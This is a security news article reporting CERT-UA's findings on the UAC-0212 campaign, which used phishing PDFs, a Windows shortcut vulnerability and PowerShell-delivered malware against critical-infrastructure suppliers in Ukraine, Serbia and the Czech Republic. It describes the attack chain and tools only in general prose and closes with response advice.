Thursday, May 8, 2025
Homecyber securityUAC-0212: Hackers Unleash Devastating Cyber Attack on Critical Infrastructure

UAC-0212: Hackers Unleash Devastating Cyber Attack on Critical Infrastructure

Published on

SIEM as a Service

Follow Us on Google News

In a recent escalation of cyber threats, hackers have launched a targeted campaign, identified as UAC-0212, aimed at compromising critical infrastructure facilities in Ukraine.

This campaign, which began in the second half of 2024, involves sophisticated tactics to infiltrate the networks of developers and suppliers of automation and process control solutions.

The attackers’ ultimate goal is to disrupt the information and communication systems (ICS) of enterprises in vital sectors such as energy, water, and heat supply.

- Advertisement - Google News

UAC-0212: Hackers Unleash Devastating Cyber Assault on Critical Infrastructure

The UAC-0212 campaign is notable for its use of novel techniques, including the distribution of PDF documents containing malicious links.

These links exploit the CVE-2024-38213 vulnerability, leading to the download of an LNK file.

UAC-0212
Example of a chain of damage

Once executed, this file triggers a PowerShell command that displays a decoy document while secretly downloading and installing malicious EXE/DLL files.

Tools like SECONDBEST, EMPIREPAST, SPARK, and CROOKBAG have been identified as part of this operation.

Additionally, RSYNC is used for long-term document theft, highlighting the attackers’ intent to gather sensitive information.

The geography of the attack is extensive, with targets including companies from Serbia, the Czech Republic, and Ukraine.

Between July 2024 and February 2025, multiple logistics and equipment manufacturing companies were compromised.

The attackers often pose as potential customers, engaging in correspondence with victims over several days to gain trust before sending malicious documents.

This approach allows them to move quickly through the network, establishing persistence on servers and workstations within hours of initial compromise.

Impact and Response

The UAC-0212 campaign underscores the increasing threat to critical infrastructure worldwide.

Given the attackers’ ability to rapidly spread through networks, simply identifying and reinstalling affected systems is insufficient.

CERT-UA urges supplier companies to contact them for comprehensive technical investigations and incident response measures.

The agency provides cyber threat indicators and encourages vigilance among enterprises that may have been targeted.

As the threat landscape evolves, it is crucial for organizations to enhance their cybersecurity posture, particularly those involved in critical infrastructure.

The use of advanced threat detection tools and regular network audits can help mitigate such attacks.

The ongoing nature of these cyber operations highlights the need for continuous monitoring and collaboration between cybersecurity entities to counter emerging threats effectively.

Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting - Register Here

Aman Mishra
Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Latest articles

Critical Vulnerability in Ubiquiti UniFi Protect Camera Allows Remote Code Execution by Attackers

Critical security vulnerabilities in Ubiquiti’s UniFi Protect surveillance ecosystem-one rated the maximum severity score...

IXON VPN Client Vulnerability Allows Privilege Escalation for Attackers

A critical security vulnerability in IXON’s widely used VPN client has exposed Windows, Linux,...

Cisco IOS Software SISF Vulnerability Could Enable Attackers to Launch DoS Attacks

Cisco has released security updates addressing a critical vulnerability in the Switch Integrated Security...

Seamless AI Communication: Microsoft Azure Adopts Google’s A2A Protocol

Microsoft has announced its support for the Agent2Agent (A2A) protocol, an open standard developed...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Critical Vulnerability in Ubiquiti UniFi Protect Camera Allows Remote Code Execution by Attackers

Critical security vulnerabilities in Ubiquiti’s UniFi Protect surveillance ecosystem-one rated the maximum severity score...

IXON VPN Client Vulnerability Allows Privilege Escalation for Attackers

A critical security vulnerability in IXON’s widely used VPN client has exposed Windows, Linux,...

Cisco IOS Software SISF Vulnerability Could Enable Attackers to Launch DoS Attacks

Cisco has released security updates addressing a critical vulnerability in the Switch Integrated Security...